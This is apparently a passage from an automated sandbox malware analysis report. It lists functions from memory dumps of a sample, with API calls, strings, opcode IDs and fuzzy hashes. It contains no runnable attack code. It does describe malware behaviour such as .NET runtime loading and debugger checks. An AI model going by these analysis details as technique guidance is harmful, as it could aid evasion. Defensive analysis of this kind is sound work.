                                                                                          • Instruction ID: 8808148667c6cd54ed25cb498a734680b2f4e630a8917364281ff5b6833f40ec
                                                                                          • Opcode Fuzzy Hash: a969cb2f9f193a11f7d49211a8c1ab0c7c623b7eda1953bf8e68cdac006a0b9c
                                                                                          • Instruction Fuzzy Hash: ECD0C93024020C9FDF255AB1EA09B577B9CDB00359F00D82AF80986650DB32D4548650
                                                                                          Function 02EB09B0 Relevance: .0, Instructions: 10COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87b02d907ba821f6376591ea6bcd815595675b4d95f0393bab5c5c3764f7ecce
                                                                                          • Instruction ID: f181a0b7e52ca1e716825278252cba4b7d314ba411b85765508e2c0387b0a97f
                                                                                          • Opcode Fuzzy Hash: 87b02d907ba821f6376591ea6bcd815595675b4d95f0393bab5c5c3764f7ecce
                                                                                          • Instruction Fuzzy Hash: 74C02B300C570587C27133F8F0083AF7A9C5F45319F40A010F10C024104FB02040C7F6
                                                                                          Function 02EB0848 Relevance: .0, Instructions: 9COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0dee4ba1149c54dc87b7e3028bccc1fa83b0733d74a97e156ac52d5cb6046eb3
                                                                                          • Instruction ID: 6a2fadf9c86c6c7bde5fae63f91856e73febfeb8a255fc467d67d2058411b791
                                                                                          • Opcode Fuzzy Hash: 0dee4ba1149c54dc87b7e3028bccc1fa83b0733d74a97e156ac52d5cb6046eb3
                                                                                          • Instruction Fuzzy Hash: 76B0923008570A8BDE35ABD8B8087BEBBAC6B4532EF88A114A54C018949FB06150D7E6

                                                                                          Non-executed Functions

                                                                                          Function 6D022D70 Relevance: 35.2, APIs: 23, Instructions: 669COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022DFF
                                                                                          • VariantInit.OLEAUT32(?), ref: 6D022E08
                                                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D022E7E
                                                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6D022EB5
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D022EC1
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C88F
                                                                                            • Part of subcall function 6D02C850: VariantInit.OLEAUT32(?), ref: 6D02C895
                                                                                            • Part of subcall function 6D02C850: SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6D02C8A0
                                                                                            • Part of subcall function 6D02C850: SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6D02C8D5
                                                                                            • Part of subcall function 6D02C850: VariantClear.OLEAUT32(?), ref: 6D02C8E1
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D0230D5
                                                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6D023550
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023563
                                                                                          • VariantClear.OLEAUT32(?), ref: 6D023569
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ArrayClearSafe$Init$CreateElementVector$Destroy
                                                                                          • String ID:
                                                                                          • API String ID: 2012514194-0
                                                                                          • Opcode ID: 8837b812cbcf8373d0fd90d95654755163ed0aaaba194f8163a2e6e45a5540cb
                                                                                          • Instruction ID: 0976313675be836129c5f30aa0c30040f465dfb83c94403fc4abc1ab0b906f33
                                                                                          • Opcode Fuzzy Hash: 8837b812cbcf8373d0fd90d95654755163ed0aaaba194f8163a2e6e45a5540cb
                                                                                          • Instruction Fuzzy Hash: 63526B71905219DFEB14DFA8C884BEEBBF6BF89300F158199E909AB351D730A945CF90
                                                                                          Function 6D01A0C0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 227libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CorBindToRuntimeEx.MSCOREE(v2.0.50727,wks,00000000,6D090634,6D090738,?), ref: 6D01A119
                                                                                          • GetModuleHandleW.KERNEL32(mscorwks), ref: 6D01A145
                                                                                          • __cftoe.LIBCMT ref: 6D01A1FB
                                                                                          • GetModuleHandleW.KERNEL32(?), ref: 6D01A215
                                                                                          • GetProcAddress.KERNEL32(00000000,00000018), ref: 6D01A265
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleModule$AddressBindProcRuntime__cftoe
                                                                                          • String ID: mscorwks$v2.0.50727$wks
                                                                                          • API String ID: 1312202379-2066655427
                                                                                          • Opcode ID: 64a64552890502e30d0411f34a6cc1e28c4497091908993f1bc01d51c9af9705
                                                                                          • Instruction ID: 132637c928f814d451af7477a01d366f8eec43534d1a1724b561094dc3c80e7f
                                                                                          • Opcode Fuzzy Hash: 64a64552890502e30d0411f34a6cc1e28c4497091908993f1bc01d51c9af9705
                                                                                          • Instruction Fuzzy Hash: 6A916E71D082499FEB04DFE9D980AAEBBF5BF49310F20826DE519EB341D730994ACB54
                                                                                          Function 6D05DBB0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,4E8A916F,6D088180,00000000,?), ref: 6D05DBFB
                                                                                          • GetLastError.KERNEL32 ref: 6D05DC01
                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000008), ref: 6D05DC15
                                                                                          • CryptAcquireContextA.ADVAPI32(?,Crypto++ RNG,00000000,00000001,00000028), ref: 6D05DC26
                                                                                          • SetLastError.KERNEL32(00000000), ref: 6D05DC2D
                                                                                            • Part of subcall function 6D05D9D0: GetLastError.KERNEL32(00000010,4E8A916F,75A8FC30,?,00000000), ref: 6D05DA1A
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D05DC78
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: AcquireContextCryptErrorLast$ExceptionException@8RaiseThrow
                                                                                          • String ID: CryptAcquireContext$Crypto++ RNG
                                                                                          • API String ID: 3279666080-1159690233
                                                                                          • Opcode ID: 4fb440c83a28b4405ecb25be71f301f10313e1484008fe327365395004adc84c
                                                                                          • Instruction ID: 68aead561c4a7979a8f95c695b474a851493052fd57da4f78f00d3f33ab58b14
                                                                                          • Opcode Fuzzy Hash: 4fb440c83a28b4405ecb25be71f301f10313e1484008fe327365395004adc84c
                                                                                          • Instruction Fuzzy Hash: 0421CF7124C341ABF710EB24CC45F6BBBE8EB8A745F00091EF641972C1EBB5E0048BA6
                                                                                          Function 02EBF498 Relevance: 8.1, Strings: 6, Instructions: 609COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1763634407.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2eb0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'^q$4'^q$4'^q$4|cq$4|cq$$^q
                                                                                          • API String ID: 0-1027864050
                                                                                          • Opcode ID: 057a7a92724360c60a85edebb2c2d4c9466e9613ceead53997455433d1e36cf0
                                                                                          • Instruction ID: 4de691cabbf46ce855a253f5615dd07919b0e92ada2b753ad752f3f6f7e7a2b7
                                                                                          • Opcode Fuzzy Hash: 057a7a92724360c60a85edebb2c2d4c9466e9613ceead53997455433d1e36cf0
                                                                                          • Instruction Fuzzy Hash: BF22B131B402158FCB1ADF69D8946EF7BB2AF89704B15D469E406EB761CB30DC41CB91
                                                                                          Function 6D06948B Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6D06CE6C
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D06CE81
                                                                                          • UnhandledExceptionFilter.KERNEL32(6D089428), ref: 6D06CE8C
                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 6D06CEA8
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 6D06CEAF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 2579439406-0
                                                                                          • Opcode ID: 5662b6d88abf9adb68f9f07f8ac4bdc3f97aea7fd5a8e3ad757e9b5b9cca6634
                                                                                          • Instruction ID: 80a48f6f3fe7d7605695a7ccddffbba2ba00b12322335fd4b4849491ea4649a4
                                                                                          • Opcode Fuzzy Hash: 5662b6d88abf9adb68f9f07f8ac4bdc3f97aea7fd5a8e3ad757e9b5b9cca6634
                                                                                          • Instruction Fuzzy Hash: 782100B5908A48DFDF50DF58D0A478D3BB4FB2B315F18411AE50987B42E7B08980CF59
                                                                                          Function 6D062310 Relevance: 6.7, APIs: 4, Instructions: 663COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D0624A1
                                                                                            • Part of subcall function 6D06AC75: RaiseException.KERNEL32(?,?,6D069C34,4E8A916F,?,?,?,?,6D069C34,4E8A916F,6D099C90,6D0AB974,4E8A916F), ref: 6D06ACB7
                                                                                          • std::exception::exception.LIBCMT ref: 6D06248C
                                                                                            • Part of subcall function 6D069533: std::exception::_Copy_str.LIBCMT ref: 6D06954E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Copy_strExceptionException@8RaiseThrowstd::exception::_std::exception::exception
                                                                                          • String ID:
                                                                                          • API String ID: 757275642-0
                                                                                          • Opcode ID: c0e190617163c3dd19e7d7bde7217b61051af7dff460e1047e7e8212624e0ce5
                                                                                          • Instruction ID: d82abc6074d4eae6988c0d2b97a2faeaf3719aa7a3b45c19ea6e6c576adb42d7
                                                                                          • Opcode Fuzzy Hash: c0e190617163c3dd19e7d7bde7217b61051af7dff460e1047e7e8212624e0ce5
                                                                                          • Instruction Fuzzy Hash: 08326071A056469FEB24CFA8C890BAEB7F6FF89744B14412DE506DB254E730E901CBB1
                                                                                          Function 6D055DD0 Relevance: 6.4, APIs: 4, Instructions: 390COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 313dfbb147e5f45f41dab0490e768de3bc991367dd32f81ddf0586a4f97419d6
                                                                                          • Instruction ID: ce49f7851eebd749eda3b32df7edddc2e89d16af2da038dddf2df7e42e2ee6d1
                                                                                          • Opcode Fuzzy Hash: 313dfbb147e5f45f41dab0490e768de3bc991367dd32f81ddf0586a4f97419d6
                                                                                          • Instruction Fuzzy Hash: D502AE704187A88FC744CF69C4B4A7EBBF1EBDA211F45090EE6F657292C334A568CB61
                                                                                          Function 6D055EB9 Relevance: 6.3, APIs: 4, Instructions: 318COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: b682528a1a356f307816c10e90a5f4c8191f4f4e1c8c512b4258ca3bb685452a
                                                                                          • Instruction ID: de51b802f36edc08d18ec08f56bd812aee9787ba761a87eafb94c84d029917a4
                                                                                          • Opcode Fuzzy Hash: b682528a1a356f307816c10e90a5f4c8191f4f4e1c8c512b4258ca3bb685452a
                                                                                          • Instruction Fuzzy Hash: 0BE1B0704187A88FC744CB69D8B4A7E7BF1EBDA211F49050EE6F5472A2D334A16CDB21
                                                                                          Function 05CC0930 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1768998212.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_5cc0000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HERE$LOOK$Gvq$Gvq
                                                                                          • API String ID: 0-802966049
                                                                                          • Opcode ID: 5da0c9cbf5c37495b3c826ea4ef293e657dbee9cc00221debb36c823e1270f60
                                                                                          • Instruction ID: e905a2031ec4e25bcb6d6dd1b8e7b7a7d35d65c3e92086d25b04b5bb661083b9
                                                                                          • Opcode Fuzzy Hash: 5da0c9cbf5c37495b3c826ea4ef293e657dbee9cc00221debb36c823e1270f60
                                                                                          • Instruction Fuzzy Hash: 3EF1A074E452298FDB64DF69C988BDDBBF6BB48310F1486EAD409A7351DB309E808F50
                                                                                          Function 6D05DE00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57encryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CryptGenRandom.ADVAPI32(?,?,?,4E8A916F,00000000), ref: 6D05DE6F
                                                                                          • __CxxThrowException@8.LIBCMT ref: 6D05DEB9
                                                                                            • Part of subcall function 6D05DD20: CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000000,6D07F0E6,000000FF,6D05DF67,00000000,?), ref: 6D05DDB4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: Crypt$ContextException@8RandomReleaseThrow
                                                                                          • String ID: CryptGenRandom
                                                                                          • API String ID: 1047471967-3616286655
                                                                                          • Opcode ID: 0032278fb9318706af4ee3a85ed1815548db217c35f71a2afd16c45695f0bd83
                                                                                          • Instruction ID: 64c8bbaf80c00c5b91ca6e0d7723e086e15e266aa72a0e8ecebaf47e5668e686
                                                                                          • Opcode Fuzzy Hash: 0032278fb9318706af4ee3a85ed1815548db217c35f71a2afd16c45695f0bd83
                                                                                          • Instruction Fuzzy Hash: E821387550C7849FE700DF28C554B5ABBF9FB89718F044A0EF85587281E774E504CBA2
                                                                                          Function 6D0563B0 Relevance: 5.1, APIs: 3, Instructions: 648COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: _memmove
                                                                                          • String ID:
                                                                                          • API String ID: 4104443479-0
                                                                                          • Opcode ID: d93d99bc1987f8eeaab4533189e5957cd0032092d7a21398ce956abb3b13e109
                                                                                          • Instruction ID: c77111834550c14e902e420e4be8bc5cbdff1912c7f8e6d2e370a93f0bdbe04f
                                                                                          • Opcode Fuzzy Hash: d93d99bc1987f8eeaab4533189e5957cd0032092d7a21398ce956abb3b13e109
                                                                                          • Instruction Fuzzy Hash: 225202709046658FDB14CF29C0A067ABBF2EFCA311B58859DD8D68B386D334F556CBA0
                                                                                          Function 6D05D9D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(00000010,4E8A916F,75A8FC30,?,00000000), ref: 6D05DA1A
                                                                                            • Part of subcall function 6D004010: std::_Xinvalid_argument.LIBCPMT ref: 6D00402A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1770420201.000000006D001000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D000000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1770344436.000000006D000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770718124.000000006D084000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770785053.000000006D09E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770811025.000000006D0A0000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770868632.000000006D0A1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770904772.000000006D0A3000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1770938928.000000006D0AC000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1771040358.000000006D0AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d000000_SecuriteInfo.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastXinvalid_argumentstd::_
                                                                                          • String ID: operation failed with error $OS_Rng:
                                                                                          • API String ID: 406877150-700108173
                                                                                          • Opcode ID: 0c89c0f62346d20a1ccac85d37f75faf5fd4223901853b31d1e2262bd4db99ca
